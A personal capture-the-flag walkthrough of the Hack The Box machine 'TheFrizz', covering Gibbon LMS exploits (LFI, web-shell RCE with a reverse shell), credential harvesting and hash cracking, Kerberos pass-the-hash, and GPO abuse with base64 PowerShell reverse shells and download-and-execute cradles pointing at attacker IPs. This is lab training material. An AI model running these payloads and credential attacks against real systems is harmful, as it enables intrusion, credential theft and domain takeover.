Here is my note on THEFRIZZ box from Hackthebox.
THEFRIZZ: 10.129.99.125
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
ssh -K f.frizzle@10.129.99.125
f.frizzle@10.129.99.125: Permission denied (gssapi-with-mic,keyboard-interactive).
#WASTE OF TIME, DON'T BOTHER !
#WILL CONSIDER IT.
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
frizzdc.frizz.htb
dirsearch -u http://frizzdc.frizz.htb/
/home:
There is base64 code in the main page of /home:
V2FudCB0byBsZWFybiBoYWNraW5n IGJ1dCBkb24ndCB3YW50IHRvIGdv IHRvIGphaWw/IFlvdSdsbCBsZWFy biB0aGUgaW4ncyBhbmQgb3V0cyBv ZiBTeXNjYWxscyBhbmQgWFNTIGZy b20gdGhlIHNhZmV0eSBvZiBpbnRl cm5hdGlvbmFsIHdhdGVycyBhbmQg aXJvbiBjbGFkIGNvbnRyYWN0cyBm cm9tIHlvdXIgY3VzdG9tZXJzLCBy ZXZpZXdlZCBieSBXYWxrZXJ2aWxs ZSdzIGZpbmVzdCBhdHRvcm5leXMu
┌──(root㉿kali)-[/home/kali/BOXES/THEFRIZZ/10.129.99.125]
└─# cat text.txt
V2FudCB0byBsZWFybiBoYWNraW5n
IGJ1dCBkb24ndCB3YW50IHRvIGdv
IHRvIGphaWw/IFlvdSdsbCBsZWFy
biB0aGUgaW4ncyBhbmQgb3V0cyBv
ZiBTeXNjYWxscyBhbmQgWFNTIGZy
b20gdGhlIHNhZmV0eSBvZiBpbnRl
cm5hdGlvbmFsIHdhdGVycyBhbmQg
aXJvbiBjbGFkIGNvbnRyYWN0cyBm
cm9tIHlvdXIgY3VzdG9tZXJzLCBy
ZXZpZXdlZCBieSBXYWxrZXJ2aWxs
ZSdzIGZpbmVzdCBhdHRvcm5leXMu
┌──(root㉿kali)-[/home/kali/BOXES/THEFRIZZ/10.129.99.125]
└─# cat text.txt | base64 -d
Want to learn hacking but don't want to go to jail? You'll learn the in's and outs of Syscalls and XSS from the safety of international waters and iron clad contracts from your customers, reviewed by Walkerville's finest attorneys.base64: invalid input
Click Staff Login blue button leads to Gibbon-LMS page.
/Gibbon-LMS:
No admin:admin = NOPE !
No Default-Creds such as admin:gibbon and admin:password = NOPE !
https://github.com/Zer0F8th/CVE-2023-34598 - Vulnerable to LFI EXPLOIT !
Gibbon v25.0.00
python3 CVE-2023-34598.py scan http://frizzdc.frizz.htb/Gibbon-LMS/
[*] Scanning URL: http://frizzdc.frizz.htb/Gibbon-LMS
[+] Target appears vulnerable. Saving dump...
[+] Database dump saved to 'Gibbon_dump-2/gibbon.sql'.
https://github.com/maddsec/CVE-2023-34598
http://frizzdc.frizz.htb/Gibbon-LMS/?q=gibbon.sql - WORKS !
LFI EXPLOIT !
#NO stealing responder attack.
ffuf -u http://frizzdc.frizz.htb/Gibbon-LMS/?q=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
It seems I can only access within Gibbon-LMS directory:
https://github.com/GibbonEdu/core
LFI is a rabbit hole, use a different exploit.
It's vulnerable to CVE-2023-45878 !
https://github.com/dgoorden/CVE-2023-45878
-RCE EXPLOIT !
┌──(root㉿kali)-[/home/…/BOXES/THEFRIZZ/10.129.99.125/CVE-2023-45878]
└─# python3 CVE-2023-45878.py
usage: CVE-2023-45878.py [-h] -l LHOST -p LPORT -u URL [-f FILENAME]
CVE-2023-45878.py: error: the following arguments are required: -l/--lhost, -p/--lport, -u/--url
┌──(root㉿kali)-[/home/…/BOXES/THEFRIZZ/10.129.99.125/CVE-2023-45878]
└─# python3 CVE-2023-45878.py -u http://frizzdc.frizz.htb/Gibbon-LMS -l 10.10.14.93 -p 1234 -f shell
[!] Exploit written for CVE-2023-45878, Gibbon LMS 25.0.1
[+] Exploit Sent to: http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php
[+] Reverse Shell Target: 10.10.14.93:1234
[!] Make sure you have a listener running: nc -lvnp 1234
[+] HTTP Response Code: 200
[+] PHP Web Shell Uploaded Successfully!
[+] Attempting to trigger reverse shell...
[+] Payload delivered. Check your listener.
[!] If no connection, verify manually: http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=whoami
sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.93] from (UNKNOWN) [10.129.99.125] 52516
SHELL> whoami
frizz\w.webservice
SHELL> hostname
frizzdc
USER-SHELL !
Persist it with the meterpreter of metasploit as usual.
C:\Users = access-denied.
PRIV ESC:
w.webservice -> f.frizzle:
Rubeus.exe:
No Keberoasting and Asreproasting = DON'T BOTHER !
netstat -ap tcp
TCP 0.0.0.0:3306 frizzdc:0 LISTENING
Mysql service for gibbon database ?
#There is config.php in C:\xampp\htdocs\Gibbon-LMS.
C:\xampp\htdocs\Gibbon-LMS>type config.php
type config.php
[SNIP]
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
[SNIP]
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
/**
* Sets a globally unique id, to allow multiple installs on a single server.
*/
$guid = '7y59n5xz-uym-ei9p-7mmq-83vifmtyey2';
/**
* Sets system-wide caching factor, used to balance performance and freshness.
* Value represents number of page loads between cache refresh.
* Must be positive integer. 1 means no caching.
*/
$caching = 10;
C:\xampp\htdocs\Gibbon-LMS>net user /domain
net user /domain
User accounts for \\FRIZZDC
-------------------------------------------------------------------------------
a.perlstein Administrator c.ramon
c.sandiego d.hudson f.frizzle
g.frizzle Guest h.arm
J.perlstein k.franklin krbtgt
l.awesome m.ramon M.SchoolBus
p.terese r.tennelli t.wright
v.frizzle w.li w.Webservice
Re-Used the password to these users ?
a.perlstein
Administrator
c.ramon
c.sandiego
d.hudson
f.frizzle
g.frizzle
Guest
h.arm
J.perlstein
k.franklin
krbtgt
l.awesome
m.ramon
M.SchoolBus
p.terese
r.tennelli
t.wright
v.frizzle
w.li
w.Webservice
#NOPE, NO Re-Used the password to these users.
./chisel server -p 8000 --reverse
./chisel exe client 10.10.14.93:8000 R:3306:localhost:3306
mysql -u MrGibbonsDB -p -h 127.0.0.1
MisterGibbs!Parrot!?1
┌──(root㉿kali)-[/home/kali/BOXES/THEFRIZZ/10.129.99.125]
└─# mysql -u MrGibbonsDB -p -h 127.0.0.1
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 1093
Server version: 10.4.32-MariaDB mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
use gibbon;
select * from gibbonPerson;
Gibbon-LMS Database User Hash-Cracking:
f.frizzle:067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489
/aACFhikmNopqrRTVz2489 = 22
AbDfFgGiKlorRtTUy34579 = 22
https://github.com/Profzzor/gibbon-cracker
┌──(root㉿kali)-[/home/kali/BOXES/THEFRIZZ/gibbon-cracker]
└─# python3 gibbon_cracker.py -w '/usr/share/wordlists/rockyou.txt' -s '/aACFhikmNopqrRTVz2489' -H '067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03'
[+] Password found: Jenni_Luvs_Magic23
f.frizzle:Jenni_Luvs_Magic23
$SecPassword = ConvertTo-SecureString 'Jenni_Luvs_Magic23' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('frizz.htb\f.frizzle', $SecPassword)
$session = New-PSSession -ComputerName FRIZZDC.FRIZZ.HTB -Credential $Cred
Invoke-Command -Session $session -ScriptBlock {whoami}
#NOPE, DON'T WORK but we can login gibbon-lms website as f.frizzle user.
Gibbon-LMS as f.frizzle:
Invoke-Command -Session $session -ScriptBlock {Start-Process cmd}
#NOPE
As I was right, kerberos authentication only.
10.129.154.9 frizzdc.frizz.htb frizz.htb frizzdc
crackmapexec smb 10.129.99.125 -d frizz.htb -u users.txt -p Jenni_Luvs_Magic23 -k
[SNIP]
SMB 10.129.99.125 445 10.129.99.125 [-] frizz.htb\f.frizzle: KDC_ERR_S_PRINCIPAL_UNKNOWN
[SNIP]
nxc smb frizzdc.frizz.htb -k -u f.frizzle -p 'Jenni_Luvs_Magic23'
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23
SSH with Kerberos Authentication:
https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/
getTGT.py frizz.htb/f.frizzle -dc-ip 10.129.154.9 -hashes :96198B704E6586B657FD425C7BAAF105
nxc smb frizzdc.frizz.htb -k -u f.frizzle -H '96198B704E6586B657FD425C7BAAF105'
ntpdate 10.129.154.9
ticketConverter.py f.frizzle.ccache f.frizzle.kirbi
export KRB5CCNAME=/home/kali/BOXES/f.frizzle.ccache
export KRB5CCNAME=/home/kali/BOXES/f.frizzle.kirbi
ssh -o GSSAPIAuthentication=yes -o GSSAPIDelegateCredentials=yes f.frizzle@10.129.154.9
python3 psexec.py kinetic/kram@polar -k -no-pass
Works: #Consistent Way.
faketime -f $(ntpdate -q frizzdc.frizz.htb | awk '{print $4}') bash
getTGT.py frizz.htb/f.frizzle -dc-ip 10.129.154.9 -hashes :96198B704E6586B657FD425C7BAAF105
export KRB5CCNAME=/home/kali/BOXES/f.frizzle.ccache
klist
ssh -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb -vv
[SNIP]
Cannot find KDC for realm "FRIZZ.HTB"
[SNIP]
Time to edit /etc/krb5.conf:
[libdefaults]
default_realm = FRIZZ.HTB
dns_lookup_kdc = false
dns_lookup_realm = false
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
default_domain = frizz.htb
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
#Use DeepSeek AI.
┌──(root㉿kali)-[/home/kali/BOXES]
└─# klist
Ticket cache: FILE:/home/kali/BOXES/f.frizzle.ccache
Default principal: f.frizzle@FRIZZ.HTB
Valid starting Expires Service principal
03/27/2025 22:15:50 03/28/2025 08:15:50 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 03/28/2025 22:15:50
03/27/2025 22:24:58 03/28/2025 08:15:50 host/frizzdc.frizz.htb@FRIZZ.HTB
renew until 03/28/2025 22:15:50
┌──(root㉿kali)-[/home/kali/BOXES]
└─# ssh -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb -vv
ssh -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb
PS C:\Users\f.frizzle> whoami
frizz\f.frizzle
PS C:\Users\f.frizzle> hostname
frizzdc
PS C:\Users\f.frizzle> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::4589:f1db:f272:6792
Link-local IPv6 Address . . . . . : fe80::7357:40a2:9226:e09e%5
IPv4 Address. . . . . . . . . . . : 10.129.154.9
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:2bb5%5
10.129.0.1
F.FRIZZLE-SHELL !
PS C:\Users\f.frizzle\Desktop> whoami
frizz\f.frizzle
PS C:\Users\f.frizzle\Desktop> hostname
frizzdc
PS C:\Users\f.frizzle\Desktop> dir
Directory: C:\Users\f.frizzle\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 3/27/2025 2:40 PM 34 user.txt
PS C:\Users\f.frizzle\Desktop> type user.txt
43df7953ad[REDIRECTED]
USER.TXT: 43df7953ad[REDIRECTED]
f.frizzle -> M.SchoolBus
scp -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb:C:/Users/f.frizzle/BloodHound.zip .
No whoami /priv
No whoami /groups
No Interesting Vulnerable Programs (Program Files and Program Files (x86)).
No interesting in inetpub.
$RECYCLE.BIN PRIV ESC NOTES:
#Always consider check $RECYCLE.BIN Folder: cd C:\`RECYCLE.BIN
PS C:\> ls -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs 10/29/2024 7:31 AM $RECYCLE.BIN
d--h- 3/10/2025 3:31 PM $WinREAgent
d--hs 2/20/2025 2:51 PM Config.Msi
l--hs 10/29/2024 9:12 AM Documents and Settings -> C:\Users
d---- 3/10/2025 3:39 PM inetpub
d---- 5/8/2021 1:15 AM PerfLogs
d-r-- 2/26/2025 8:13 AM Program Files
d---- 5/8/2021 2:34 AM Program Files (x86)
d--h- 2/20/2025 2:50 PM ProgramData
d--hs 10/29/2024 9:12 AM Recovery
d--hs 10/29/2024 7:25 AM System Volume Information
d-r-- 10/29/2024 7:31 AM Users
d---- 3/10/2025 3:41 PM Windows
d---- 10/29/2024 7:28 AM xampp
-a-hs 10/29/2024 8:27 AM 12288 DumpStack.log.tmp
PS C:\> cd $RECYCLE.BIN
PS C:\Users\f.frizzle> cd C:\`$RECYCLE.BIN
PS C:\$RECYCLE.BIN> ls -Force
Directory: C:\$RECYCLE.BIN
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs 10/29/2024 7:31 AM S-1-5-21-2386970044-1145388522-2932701813-1103
cd C:\`$RECYCLE.BIN = The Correct one.
PS C:\$RECYCLE.BIN> ls -Force
Directory: C:\$RECYCLE.BIN
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs 10/29/2024 7:31 AM S-1-5-21-2386970044-1145388522-2932701813-1103
PS C:\$RECYCLE.BIN> cd S-1-5-21-2386970044-1145388522-2932701813-1103
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> dir
Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/29/2024 7:31 AM 148 $IE2XMEG.7z
-a--- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z
mkdir C:\Temp\Recovered
cp `$IE2XMEG.7z C:\Temp\Recovered\
cp `$RE2XMEG.7z C:\Temp\Recovered\
scp -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb:C:/Temp/Recovered/'$IE2XMEG.7z' .
scp -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb:C:/Temp/Recovered/'$RE2XMEG.7z' .
┌──(root㉿kali)-[/home/kali/BOXES]
└─# scp -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb:C:/Temp/Recovered/'$IE2XMEG.7z' .
$IE2XMEG.7z 100% 148 1.4KB/s 00:00
┌──(root㉿kali)-[/home/kali/BOXES]
└─# scp -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb:C:/Temp/Recovered/'$RE2XMEG.7z' .
$RE2XMEG.7z 100% 29MB 1.6MB/s 00:17
┌──(root㉿kali)-[/home/kali/BOXES]
└─# ls
'$IE2XMEG.7z' '$RE2XMEG.7z' BloodHound.zip f.frizzle.ccache f.frizzle.kirbi
┌──(root㉿kali)-[/home/kali/BOXES]
└─# cp '$IE2XMEG.7z' IE2XMEG.7z
┌──(root㉿kali)-[/home/kali/BOXES]
└─# cp '$RE2XMEG.7z' RE2XMEG.7z
REXMEG.7z is the one however it's finding a needle in the haystack all over again.
REXMEG.7z:
┌──(root㉿kali)-[/home/kali/BOXES/7z/RE]
└─# grep -rPio 'pass(word|wd|phrase)?[=:][\s]?[A-Za-z0-9+/]{20,}={0,2}' /home/kali/BOXES/7z/RE 2>/dev/null | while read -r line; do
encoded=$(echo "$line" | grep -Po '[A-Za-z0-9+/]{20,}={0,2}$')
echo -n "Found: $line -> Decoded: "
echo "$encoded" | base64 -d 2>/dev/null
echo
done
Found: /home/kali/BOXES/7z/RE/wapt-get.ini.tmpl:password=5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8 -> Decoded: <|uӎWt{:~馛mz٭uyyg|
┌──(root㉿kali)-[/home/kali/BOXES/7z/RE]
└─# grep -rPio 'pass(word|wd|phrase)?[=:][\s]?[A-Za-z0-9+/]{20,}={0,2}' /home/kali/BOXES/7z/RE 2>/dev/null | while read -r line; do
encoded=$(echo "$line" | grep -Po '[A-Za-z0-9+/]{20,}={0,2}$')
echo -n "Found: $line -> Decoded: "
echo "$encoded" | base64 -d 2>/dev/null
echo
done
Found: /home/kali/BOXES/7z/RE/wapt-get.ini.tmpl:password=5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8 -> Decoded: <|uӎWt{:~馛mz٭uyyg|
#NOPE, not the right-one.
grep -rPio 'pass(word|wd|phrase)?[=:]' /home/kali/BOXES/7z/RE 2>/dev/null | while read -r line; do
encoded=$(echo "$line" | grep -Po '[A-Za-z0-9+/]{20,}={0,2}$')
echo -n "Found: $line -> Decoded: "
echo "$encoded" | base64 -d 2>/dev/null
echo
done
#IT DIDN'T WORK.
After a couple hours of enumeration, I found waptserver.ini:
If there so much file to enumerate such finding a needle in the haystack, look at .ini file cause this file usually contain very interesting file.
┌──(root㉿kali)-[/home/kali/BOXES/7z/RE]
└─# cat waptserver.ini
[options]
allow_unauthenticated_registration = True
wads_enable = True
login_on_wads = True
waptwua_enable = True
secret_key = ylPYfn9tTU9IDu9yssP2luKhjQijHKvtuxIzX9aWhPyYKtRO7tMSq5sEurdTwADJ
server_uuid = 646d0847-f8b8-41c3-95bc-51873ec9ae38
token_secret_key = 5jEKVoXmYLSpi5F7plGPB4zII5fpx0cYhGKX5QC0f7dkYpYmkeTXiFlhEJtZwuwD
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
clients_signing_key = C:\wapt\conf\ca-192.168.120.158.pem
clients_signing_certificate = C:\wapt\conf\ca-192.168.120.158.crt
[tftpserver]
root_dir = c:\wapt\waptserver\repository\wads\pxe
log_path = c:\wapt\log
┌──(root㉿kali)-[/home/kali/BOXES/7z/RE]
└─# echo "IXN1QmNpZ0BNZWhUZWQhUgo=" | base64 -d
!suBcig@MehTed!R
┌──(root㉿kali)-[/home/kali/BOXES/7z]
└─# nxc smb frizzdc.frizz.htb -k -u users.txt -p '!suBcig@MehTed!R'
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False)
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\a.perlstein:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\Administrator:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\c.ramon:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\c.sandiego:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\d.hudson:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\f.frizzle:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\g.frizzle:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\Guest:!suBcig@MehTed!R KDC_ERR_CLIENT_REVOKED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\h.arm:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\J.perlstein:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\k.franklin:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\krbtgt:!suBcig@MehTed!R KDC_ERR_CLIENT_REVOKED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\l.awesome:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\m.ramon:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R
frizz.htb\M.SchoolBus:!suBcig@MehTed!R
M.SchoolBus is a Desktop Admins and Remote Management User.
As usual, Overpass The Hash and Kerberos authentication with SSH service.
getTGT.py frizz.htb/M.SchoolBus -dc-ip 10.129.154.9 -hashes :C5127655F826FD8FBF09B90AE0795906
export KRB5CCNAME=/home/kali/BOXES/M.SchoolBus.ccache
klist
ssh -o GSSAPIAuthentication=yes M.SchoolBus@frizzdc.frizz.htb
M.SchoolBus SHELL !
M.SchoolBus -> Administrator:
M.SchoolBus -> Member of Desktop Admins -> Member of -> GROUP POLICY CREATOR OWNERS Group.
M.SchoolBus can create a GPO and we can take it advantage to create an administrator shell.
GPO Abuse – Edit permissions misconfiguration
New-GPO -Name 'Exploit'
PS C:\Users\M.SchoolBus> New-GPO -Name 'Exploit'
DisplayName : Exploit
DomainName : frizz.htb
Owner : frizz\M.SchoolBus
Id : 0497b08b-6dea-42fc-a3ba-7c482bf26ae6
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 3/27/2025 5:47:28 PM
ModificationTime : 3/27/2025 5:47:28 PM
UserVersion :
ComputerVersion :
WmiFilter :
New-GPLink -Name "Exploit" -Target "OU=CLASS_FRIZZ,DC=FRIZZ,DC=HTB"
New-GPOImmediateTask -TaskName Debugging -GPODisplayName Exploit -CommandArguments 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANwA0ACIALAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' -Force
gpupdate
SharpGPOAbuse.exe NOTES: #THEFRIZZ
M.SchoolBus -> Member of Desktop Admins -> Member of -> GROUP POLICY CREATOR OWNERS Group.
M.SchoolBus can create a GPO and we can take it advantage to create an administrator shell.
PS C:\Users\M.SchoolBus> Get-DomainPolicy
SystemAccess : @{LSAAnonymousNameLookup=0; MaximumPasswordAge=-1; ClearTextPassword=0; PasswordComplexity=1; RequireLogonToChangePassword=0; MinimumPasswordAge=0; ForceLogoffWhenHourExpire=0; LockoutBadCount=0;
MinimumPasswordLength=0; PasswordHistorySize=0}
KerberosPolicy : @{TicketValidateClient=1; MaxServiceAge=600; MaxRenewAge=7; MaxClockSkew=5; MaxTicketAge=10}
Unicode : @{Unicode=yes}
RegistryValues : @{MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=System.String[]}
Version : @{Revision=1; signature="$CHICAGO$"}
PS C:\Users\M.SchoolBus> Get-NetOU
LDAP://OU=Domain Controllers,DC=frizz,DC=htb
LDAP://OU=Class_Frizz,DC=frizz,DC=htb
New-GPO -Name 'CMD'
New-GPLink -Name "CMD" -Target "OU=Domain Controllers,DC=FRIZZ,DC=HTB"
./SharpGPOAbuse.exe --AddComputerTask --TaskName "Task1" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c powershell -Sta -Nop -Window Hidden -Command iex (New-Object Net.WebClient).DownloadString('http://10.10.14.74/')" --GPOName "CMD"
New-GPO -Name 'REV'
New-GPLink -Name "REV" -Target "OU=Domain Controllers,DC=FRIZZ,DC=HTB"
./SharpGPOAbuse.exe --AddComputerTask --TaskName "Task1" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANwA0ACIALAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA== " --GPOName "REV"
New-GPO -Name 'Exploit'
New-GPLink -Name "Exploit" -Target "OU=CLASS_FRIZZ,DC=FRIZZ,DC=HTB"
./SharpGPOAbuse.exe --AddComputerTask --TaskName "Task1" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c powershell -Sta -Nop -Window Hidden -Command iex (New-Object Net.WebClient).DownloadString('http://10.10.14.74/')" --GPOName "Exploit"
./SharpGPOAbuse.exe --AddComputerTask --TaskName "Task1" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c powershell -Sta -Nop -Window Hidden -Command iex (New-Object Net.WebClient).DownloadString('http://10.10.14.74/')" --GPOName "Exploit2"
gpupdate
gpupdate /force
